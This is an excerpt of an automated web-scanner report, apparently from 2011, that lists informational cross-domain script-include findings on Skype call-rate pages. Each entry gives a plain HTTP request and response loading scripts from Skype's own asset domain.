   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.744. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-libya  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-libya

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-libya HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.745. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.746. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lithuania  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-lithuania

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-lithuania HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.747. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-luxembourg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-luxembourg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-luxembourg HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.748. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macao  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-macao

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-macao HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.749. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macedonia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-macedonia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-macedonia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.750. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-madagascar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-madagascar

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-madagascar HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.751. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malawi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-malawi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-malawi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.752. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malaysia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-malaysia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-malaysia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.753. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-maldives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-maldives

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-maldives HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.754. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-mexico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-mexico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-mexico HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.755. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-netherlands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-netherlands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-netherlands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.756. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-new-zealand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-new-zealand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-new-zealand HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.757. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-north-korea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-north-korea

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-north-korea HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.758. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-norway  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-norway

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-norway HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.759. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-poland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
